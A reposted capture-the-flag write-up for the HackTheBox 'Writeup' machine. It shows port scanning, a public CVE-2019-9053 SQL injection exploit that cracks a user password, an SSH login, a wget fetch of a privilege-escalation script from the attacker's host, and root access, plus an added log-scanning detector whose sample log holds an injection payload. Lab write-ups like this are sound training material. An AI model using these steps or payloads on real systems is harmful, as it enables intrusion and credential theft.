HackTheBox-Writeup

admin, 2023-02-15 13:08:55

title: HackTheBox-Writeup
author: Crazyinside
layout: true
categories: HackTheBox
cover: https://www.worldisend.com/img/Writeup.png
tags: Linux


Crazy:~/HackThebox/Writeup$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.138
[sudo] crazyinside 的密码:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 01:11:31 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.138
Discovered open port 80/tcp on 10.10.10.138
Crazy:~/HackThebox/Writeup$ sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup
[sudo] crazyinside 的密码:
Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 09:13 CST
Nmap scan report for 10.10.10.138
Host is up (0.20s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd5310700bd0470ae27e4ab6429823c7 (RSA)
|   256 372e1468aeb9c2342b6ed992bcbfbd28 (ECDSA)
|_  256 93eaa84042c1a83385b35600621ca0ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds
zsh: segmentation fault  sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup
Crazy:~/HackThebox/Writeup$ curl http://10.10.10.138/robots.txt
#              __
#      _(    |@@|
#     (__/__ --/ __
#        ___|----|  |   __
#             }{ / )_ / _
#            /__/ __O (__
#           (--/--)    __/
#           _)(  )(_
#          `---''---`
# Disallow access to the blog until content is finished.
User-agent: *
Disallow: /writeup/
Crazy:~/HackThebox/Writeup$
Crazy:~/HackThebox/Writeup$ whatweb http://10.10.10.138/writeup/
http://10.10.10.138/writeup/ [200 OK] Apache[2.4.25], CMS-Made-Simple, Cookies[CMSSESSID9d372ef93962], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.10.10.138], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.], Title[Home - writeup]

whatweb does not reveal a more precise CMS Made Simple version, so the next step is to list the known exploits for the product.

Crazy:~/HackThebox/Writeup$ searchsploit CMS Made Simple
-------------------------------------------------------------------------------------------------------
 Exploit Title  |  Path
-------------------------------------------------------------------------------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)  |  php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting  |  php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion  |  php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting  |  php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection  |  php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities  |  php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities  |  php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution  |  php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection  |  php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload  |  php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion  |  php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure  |  php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting  |  php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities  |  php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery  |  php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion  |  php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery  |  php/webapps/34068.html
CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection  |  php/webapps/48944.py
CMS Made Simple 2.1.6 - Multiple Vulnerabilities  |  php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution  |  php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)  |  php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload  |  php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)  |  php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)  |  php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated)  |  php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)  |  php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution  |  php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution  |  php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning  |  php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection  |  php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload  |  php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload  |  php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload  |  php/webapps/46546.py
-------------------------------------------------------------------------------------------------------
Shellcodes: No Results
-------------------------------------------------------------------------------------------------------
 Paper Title  |  Path
-------------------------------------------------------------------------------------------------------
CMS Made Simple v2.2.13 - Paper  |  docs/english/49947-cms-made-simp
-------------------------------------------------------------------------------------------------------

The relevant entry is the unauthenticated SQL injection in CMS Made Simple < 2.2.10, CVE-2019-9053. The script bundled with searchsploit is written for Python 2 and cannot be run here; a Python 3 port is available on GitHub:

https://github.com/4nner/CVE-2019-9053/blob/master/exploit.py
./exploit.py -u http://10.10.10.138/writeup --crack --wordlist /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
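An added, defender-side example that is not part of the original writeup: CVE-2019-9053 is a time-based blind SQL injection reached through the News module's m1_idlist parameter on moduleinterface.php, whose legitimate value is only a comma-separated list of article IDs. The Python below flags access-log requests whose m1_idlist is not numeric; the log lines are constructed, and the request shape is an assumption taken from the public exploit rather than anything shown on this page.

```python
import re
from urllib.parse import urlparse, parse_qs

# Apache "combined" log entry: client, identd, user, [timestamp], "request line", status, bytes, "referer", "agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Assumption: a legitimate m1_idlist is only comma-separated numeric article IDs, so anything
# else in it is exactly what the CVE-2019-9053 injection relied on reaching the SQL layer.
IDLIST_OK = re.compile(r'^\d+(,\d+)*$')

def check_request(target):
    """Return a short reason if the request target looks like a CMSMS News SQLi probe, else None."""
    url = urlparse(target)
    if not url.path.endswith("/moduleinterface.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # decodes %xx and '+' once
    if not params.get("mact", [""])[0].startswith("News,m1_"):
        return None
    idlist = params.get("m1_idlist", [""])[0]
    if idlist == "" or IDLIST_OK.match(idlist):
        return None
    return "non-numeric m1_idlist: %r" % idlist[:60]

def scan_log(lines):
    """Return (client_ip, timestamp, reason) for every suspicious entry in an access log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format entry
        reason = check_request(m.group("target"))
        if reason:
            hits.append((m.group("ip"), m.group("ts"), reason))
    return hits

# Constructed sample log: an ordinary News request, a time-based injection probe, an unrelated page.
SAMPLE_LOG = [
    '10.10.16.3 - - [21/Aug/2022:21:30:01 +0000] "GET /writeup/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=1,2,3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.16.3 - - [21/Aug/2022:21:30:02 +0000] "GET /writeup/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=a,b,1,5))+and+(select+sleep(5))--+ HTTP/1.1" 200 512 "-" "python-requests/2.28"',
    '10.10.16.3 - - [21/Aug/2022:21:30:08 +0000] "GET /writeup/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, reason in scan_log(SAMPLE_LOG):
        print(ip, ts, reason)
```

Patching to CMS Made Simple 2.2.10 or later removes the injection itself; the numeric check is a cheap way to spot probing in historical logs.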
Crazy:~/HackThebox/Writeup$ ssh jkr@writeup.htb
jkr@writeup.htb's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 21 21:49:32 2022 from 10.10.16.5
jkr@writeup:~$ sudo -l
-bash: sudo: command not found
jkr@writeup:~$ cat user.txt
fe...................................
jkr@writeup:~$
jkr@writeup:~$ wget http://10.10.16.3/pwk.py
--2022-08-21 21:51:50--  http://10.10.16.3/pwk.py
Connecting to 10.10.16.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3448 (3.4K) [text/x-python]
Saving to: pwk.py
pwk.py 100%[=============================================================>] 3.37K --.-KB/s in 0.01s
2022-08-21 21:51:51 (236 KB/s) - pwk.py saved [3448/3448]
jkr@writeup:~$ ls
pwk.py  sharedvuln  user.txt
jkr@writeup:~$ python pwk.py
  File "pwk.py", line 43
    cargv = (c_char_p * (len(argv) + 1))(*argv, None)
SyntaxError: only named arguments may follow *expression
jkr@writeup:~$ python3 pwk.py
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev),1000(jkr)
# cat /root/root.txt
bf84..............................
#

Originally published on the WeChat official account 老鑫安全: HackTheBox-Writeup

Reposted by CN-SEC中文网 (please keep this link when reproducing; thanks to the original author): HackTheBox-Writeup, http://cn-sec.com/archives/1282470.html
